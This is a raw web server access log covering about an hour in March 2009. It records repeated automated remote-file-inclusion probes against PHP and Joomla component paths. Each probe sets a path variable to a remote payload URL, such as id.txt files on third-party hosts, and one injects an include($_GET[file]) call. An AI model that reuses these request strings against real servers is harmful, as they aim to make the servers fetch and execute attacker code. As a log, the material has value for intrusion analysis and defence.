74.213.164.118 - - [13/Mar/2009:00:13:44 -0500] "GET /logs/access_log.1210636800//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.viniciusdemoraessp.com.br/gang11/idrose.txt?? HTTP/1.1" 404 379 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
216.15.161.2 - - [13/Mar/2009:00:14:15 -0500] "GET /logs/access_log.1219536000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
77.79.246.80 - - [13/Mar/2009:00:14:24 -0500] "GET /logs/access_log.1214956800/mvcw.php?vwar_root=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.808"
216.15.161.2 - - [13/Mar/2009:00:14:50 -0500] "GET /logs/access_log.1216944000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
216.17.106.121 - - [13/Mar/2009:00:17:15 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
77.79.246.80 - - [13/Mar/2009:00:18:52 -0500] "GET /logs/access_log.1220054400/mvcw.php?vwar_root=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.808"
77.79.246.80 - - [13/Mar/2009:00:18:56 -0500] "GET /logs/access_log.1219881600/mvcw.php?vwar_root=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.808"
216.17.106.121 - - [13/Mar/2009:00:19:31 -0500] "GET /logs/access_log.1219622400//modules/agendax/addevent.inc.php?agendax_path=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.65"
216.17.106.121 - - [13/Mar/2009:00:19:31 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
216.17.106.121 - - [13/Mar/2009:00:19:31 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
96.9.45.2 - - [13/Mar/2009:00:21:32 -0500] "GET /logs/access_log.1219449600/index.php?path=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
216.17.106.121 - - [13/Mar/2009:00:21:44 -0500] "GET /logs/access_log.1217462400//modules/agendax/addevent.inc.php?agendax_path=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.65"
201.11.166.137 - - [13/Mar/2009:00:22:00 -0500] "GET /logs//common/db.php?commonpath=http://t24ever.com/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
201.11.166.137 - - [13/Mar/2009:00:22:03 -0500] "GET //common/db.php?commonpath=http://t24ever.com/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.12.13.152 - - [13/Mar/2009:00:24:59 -0500] "GET /logs/access_log.1217203200/?INCLUDE_FOLDER=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.86.32.68 - - [13/Mar/2009:00:25:04 -0500] "GET //includes/converter.inc.php?include_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 311 "-""libwww-perl/5.808"
58.86.32.68 - - [13/Mar/2009:00:25:04 -0500] "GET /logs//includes/converter.inc.php?include_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 316 "-""libwww-perl/5.808"
81.12.13.152 - - [13/Mar/2009:00:25:14 -0500] "GET /logs/access_log.1217289600/?INCLUDE_FOLDER=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.234.18.127 - - [13/Mar/2009:00:26:06 -0500] "GET /logs//main.php?sayfa=http://www.comosonries.com/sistem.gif??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
218.234.18.127 - - [13/Mar/2009:00:26:06 -0500] "GET //main.php?sayfa=http://www.comosonries.com/sistem.gif??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
85.18.117.101 - - [13/Mar/2009:00:29:41 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
85.18.117.101 - - [13/Mar/2009:00:29:41 -0500] "GET /logs/access_log.1219536000%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
85.18.117.101 - - [13/Mar/2009:00:29:41 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
217.106.235.128 - - [13/Mar/2009:00:30:20 -0500] "GET /logs/access_log.1217030400/upgrade_album.php?GALLERY_BASEDIR=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.0" 404 316 "-""libwww-perl/5.53"
66.240.151.240 - - [13/Mar/2009:00:30:46 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.comosonries.com/FX29ID1.txt???? HTTP/1.0" 404 301 "-""Mozilla/5.0"
66.240.151.240 - - [13/Mar/2009:00:30:46 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.comosonries.com/FX29ID1.txt???? HTTP/1.0" 404 306 "-""Mozilla/5.0"
66.240.151.240 - - [13/Mar/2009:00:30:46 -0500] "GET /logs/access_log.1216425600//modules/vwar/admin/admin.php?vwar_root=http://www.comosonries.com/FX29ID1.txt???? HTTP/1.0" 404 328 "-""Mozilla/5.0"
66.240.151.240 - - [13/Mar/2009:00:31:19 -0500] "GET /logs/access_log.1217116800//modules/vwar/admin/admin.php?vwar_root=http://www.comosonries.com/FX29ID1.txt???? HTTP/1.0" 404 328 "-""Mozilla/5.0"
218.234.18.127 - - [13/Mar/2009:00:32:00 -0500] "GET //main.php?sayfa=http://www.comosonries.com/sistem.gif??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
85.18.117.101 - - [13/Mar/2009:00:32:08 -0500] "GET /logs/access_log.1216944000%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
217.106.235.128 - - [13/Mar/2009:00:32:47 -0500] "GET /logs/access_log.1215302400/upgrade_album.php?GALLERY_BASEDIR=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.0" 404 316 "-""libwww-perl/5.53"
218.234.18.127 - - [13/Mar/2009:00:32:56 -0500] "GET /logs/access_log.1217721600//main.php?sayfa=http://www.comosonries.com/sistem.gif??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
218.234.18.127 - - [13/Mar/2009:00:32:56 -0500] "GET //main.php?sayfa=http://www.comosonries.com/sistem.gif??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
218.234.18.127 - - [13/Mar/2009:00:32:57 -0500] "GET /logs//main.php?sayfa=http://www.comosonries.com/sistem.gif??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
217.106.235.128 - - [13/Mar/2009:00:34:34 -0500] "GET /logs/access_log.1215734400/upgrade_album.php?GALLERY_BASEDIR=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.0" 404 316 "-""libwww-perl/5.53"
85.18.117.101 - - [13/Mar/2009:00:35:03 -0500] "GET /logs/access_log.1219536000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
216.15.161.2 - - [13/Mar/2009:00:35:07 -0500] "GET /logs/access_log.1209686400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
85.18.117.101 - - [13/Mar/2009:00:35:48 -0500] "GET /logs/access_log.1216944000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
216.15.161.2 - - [13/Mar/2009:00:36:39 -0500] "GET /logs/access_log.1219536000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
216.15.161.2 - - [13/Mar/2009:00:37:07 -0500] "GET /logs/access_log.1216944000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
218.234.18.127 - - [13/Mar/2009:00:44:52 -0500] "GET /logs/access_log.1218067200//main.php?sayfa=http://www.comosonries.com/sistem.gif??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
218.234.18.127 - - [13/Mar/2009:00:44:54 -0500] "GET /logs/access_log.1219363200//main.php?sayfa=http://www.comosonries.com/sistem.gif??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
195.47.67.57 - - [13/Mar/2009:00:48:57 -0500] "GET /?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:00:48:57 -0500] "GET /logs/access_log.1226793600/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:00:49:03 -0500] "GET /logs/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 200 122039 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:00:49:05 -0500] "GET /logs/access_log.1223251200/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
210.118.170.11 - - [13/Mar/2009:00:51:04 -0500] "GET /logs/access_log.1219622400/components/com_simpleboard/image_upload.php?sbp=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
210.118.170.11 - - [13/Mar/2009:00:51:05 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
210.118.170.11 - - [13/Mar/2009:00:51:15 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
195.47.67.57 - - [13/Mar/2009:00:54:37 -0500] "GET /?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:00:54:43 -0500] "GET /logs/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 200 122039 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:00:54:47 -0500] "GET /logs/access_log.1217030400%20%20/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:00:55:41 -0500] "GET /logs/access_log.1218931200%20%20/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:00:55:49 -0500] "GET /?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:00:55:49 -0500] "GET /logs/access_log.1219536000/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:00:55:49 -0500] "GET /logs/access_log.1217289600/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:00:55:50 -0500] "GET /logs/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 200 122039 "-""Mozilla/5.0"
81.12.13.152 - - [13/Mar/2009:00:58:59 -0500] "GET /?DOCUMENT_ROOT=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
81.12.13.152 - - [13/Mar/2009:00:58:59 -0500] "GET /logs/access_log.1217289600/?DOCUMENT_ROOT=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
81.12.13.152 - - [13/Mar/2009:00:59:01 -0500] "GET /logs/?DOCUMENT_ROOT=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 200 122039 "-""Mozilla/5.0"
81.12.13.152 - - [13/Mar/2009:00:59:05 -0500] "GET /logs/access_log.1225929600/?DOCUMENT_ROOT=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
148.202.29.8 - - [13/Mar/2009:01:00:25 -0500] "GET /logs/access_log.1213488000/index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
148.202.29.8 - - [13/Mar/2009:01:00:25 -0500] "GET /index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
148.202.29.8 - - [13/Mar/2009:01:00:26 -0500] "GET /logs/index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
81.12.13.152 - - [13/Mar/2009:01:01:24 -0500] "GET /e404.php?DOCUMENT_ROOT=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
81.12.13.152 - - [13/Mar/2009:01:01:24 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
81.12.13.152 - - [13/Mar/2009:01:01:24 -0500] "GET /logs/access_log.1217289600%20%20/e404.php?DOCUMENT_ROOT=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.128.131.80 - - [13/Mar/2009:01:01:35 -0500] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
62.128.131.80 - - [13/Mar/2009:01:01:37 -0500] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
62.128.131.80 - - [13/Mar/2009:01:02:10 -0500] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
62.128.131.80 - - [13/Mar/2009:01:02:10 -0500] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
148.202.29.8 - - [13/Mar/2009:01:06:47 -0500] "GET /logs/access_log.1217030400//spaw/spaw_control.class.php?GLOBALS[spaw_root]=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
148.202.29.8 - - [13/Mar/2009:01:06:47 -0500] "GET //spaw/spaw_control.class.php?GLOBALS[spaw_root]=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
148.202.29.8 - - [13/Mar/2009:01:06:48 -0500] "GET /logs//spaw/spaw_control.class.php?GLOBALS[spaw_root]=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
81.12.13.152 - - [13/Mar/2009:01:10:54 -0500] "GET /logs/access_log.1217203200/e404.php?DOCUMENT_ROOT=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
81.12.13.152 - - [13/Mar/2009:01:11:03 -0500] "GET /logs/access_log.1217289600/e404.php?DOCUMENT_ROOT=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
74.200.70.234 - - [13/Mar/2009:01:13:57 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.822"
208.25.206.130 - - [13/Mar/2009:01:13:59 -0500] "GET /logs/access_log.1217030400/index.php?id=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
208.25.206.130 - - [13/Mar/2009:01:14:00 -0500] "GET /index.php?id=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
208.25.206.130 - - [13/Mar/2009:01:14:00 -0500] "GET /logs/index.php?id=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
74.200.70.234 - - [13/Mar/2009:01:15:40 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.822"
74.200.70.234 - - [13/Mar/2009:01:15:40 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.822"
74.200.70.234 - - [13/Mar/2009:01:15:54 -0500] "GET /logs/access_log.1219536000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 369 "-""libwww-perl/5.822"
74.200.70.234 - - [13/Mar/2009:01:15:54 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.822"
74.200.70.234 - - [13/Mar/2009:01:15:54 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.822"
210.118.170.11 - - [13/Mar/2009:01:16:38 -0500] "GET /logs/access_log.1218153600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
210.118.170.11 - - [13/Mar/2009:01:16:39 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
210.118.170.11 - - [13/Mar/2009:01:16:44 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
74.200.70.234 - - [13/Mar/2009:01:16:54 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.822"
74.200.70.234 - - [13/Mar/2009:01:16:54 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.822"
72.30.142.163 - - [13/Mar/2009:01:17:44 -0500] "GET /logs/access_log.1201651200 HTTP/1.0" 200 308239 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.128.131.80 - - [13/Mar/2009:01:18:39 -0500] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
62.128.131.80 - - [13/Mar/2009:01:18:39 -0500] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
62.128.131.80 - - [13/Mar/2009:01:19:21 -0500] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
62.128.131.80 - - [13/Mar/2009:01:19:22 -0500] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
61.16.172.4 - - [13/Mar/2009:01:19:54 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
62.103.26.184 - - [13/Mar/2009:01:20:02 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
208.25.206.130 - - [13/Mar/2009:01:20:07 -0500] "GET /logs/access_log.1217030400/index.php?content=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
208.25.206.130 - - [13/Mar/2009:01:20:07 -0500] "GET /index.php?content=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
208.25.206.130 - - [13/Mar/2009:01:20:07 -0500] "GET /logs/index.php?content=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
211.202.2.220 - - [13/Mar/2009:01:20:32 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://gumansin.com/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:01:20:32 -0500] "GET /logs/access_log.1217635200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:01:20:32 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:01:20:36 -0500] "GET /logs/access_log.1217548800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:01:24:18 -0500] "GET /errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:01:24:23 -0500] "GET /logs/errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:01:24:26 -0500] "GET /logs/access_log.1216944000%20%20/errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.103.26.184 - - [13/Mar/2009:01:24:58 -0500] "GET /logs/access_log.1219536000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 369 "-""libwww-perl/5.805"
62.103.26.184 - - [13/Mar/2009:01:24:59 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
62.103.26.184 - - [13/Mar/2009:01:24:59 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
195.47.67.57 - - [13/Mar/2009:01:25:04 -0500] "GET /logs/access_log.1211328000%20%20/errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:01:25:30 -0500] "GET /logs/errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:01:25:30 -0500] "GET /errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:01:25:30 -0500] "GET /logs/access_log.1216944000%20%20/errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.115.1.61 - - [13/Mar/2009:01:26:48 -0500] "GET / HTTP/1.1" 200 1243 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
113.11.196.19 - - [13/Mar/2009:01:26:59 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.65"
75.125.182.74 - - [13/Mar/2009:01:27:00 -0500] "GET /logs/access_log.1219536000//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.mishalls.com//config/id1.txt??%0D? HTTP/1.1" 404 373 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
75.125.182.74 - - [13/Mar/2009:01:27:00 -0500] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.mishalls.com//config/id1.txt??%0D? HTTP/1.1" 404 351 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
75.125.182.74 - - [13/Mar/2009:01:27:00 -0500] "GET //components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.mishalls.com//config/id1.txt??%0D? HTTP/1.1" 404 346 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
75.125.182.74 - - [13/Mar/2009:01:27:26 -0500] "GET /logs/access_log.1211932800//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.mishalls.com//config/id1.txt??%0D? HTTP/1.1" 404 373 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
148.202.29.8 - - [13/Mar/2009:01:27:58 -0500] "GET /logs/access_log.1215302400//spaw/spaw_control.class.php?GLOBALS[spaw_root]=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
122.116.105.23 - - [13/Mar/2009:01:28:29 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.817"
62.103.26.184 - - [13/Mar/2009:01:29:20 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
62.103.26.184 - - [13/Mar/2009:01:29:20 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
62.103.26.184 - - [13/Mar/2009:01:29:25 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
62.103.26.184 - - [13/Mar/2009:01:29:26 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
201.11.166.137 - - [13/Mar/2009:01:29:48 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
